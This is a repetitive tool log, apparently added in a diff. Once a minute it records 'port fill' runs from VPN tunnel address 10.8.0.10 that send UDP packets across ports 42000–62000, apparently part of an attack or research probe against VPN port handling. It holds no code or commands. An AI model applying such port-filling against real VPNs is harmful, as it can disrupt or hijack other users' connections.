10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:36:05 +Starting port fill at 2020-09-06 06:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:37:06 +Starting port fill at 2020-09-06 06:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:38:05 +Starting port fill at 2020-09-06 06:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:39:06 +Starting port fill at 2020-09-06 06:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:40:06 +Starting port fill at 2020-09-06 06:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:41:04 +Starting port fill at 2020-09-06 06:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:42:04 +Starting port fill at 2020-09-06 06:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:43:05 +Starting port fill at 2020-09-06 06:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:44:06 +Starting port fill at 2020-09-06 06:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:45:05 +Starting port fill at 2020-09-06 06:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:46:06 +Starting port fill at 2020-09-06 06:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:47:05 +Starting port fill at 2020-09-06 06:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:48:05 +Starting port fill at 2020-09-06 06:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:49:04 +Starting port fill at 2020-09-06 06:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:50:05 +Starting port fill at 2020-09-06 06:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:51:04 +Starting port fill at 2020-09-06 06:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:52:06 +Starting port fill at 2020-09-06 06:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:53:04 +Starting port fill at 2020-09-06 06:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:54:05 +Starting port fill at 2020-09-06 06:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:55:05 +Starting port fill at 2020-09-06 06:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:56:06 +Starting port fill at 2020-09-06 06:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:57:07 +Starting port fill at 2020-09-06 06:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:58:05 +Starting port fill at 2020-09-06 06:59:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:59:05 +Starting port fill at 2020-09-06 07:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 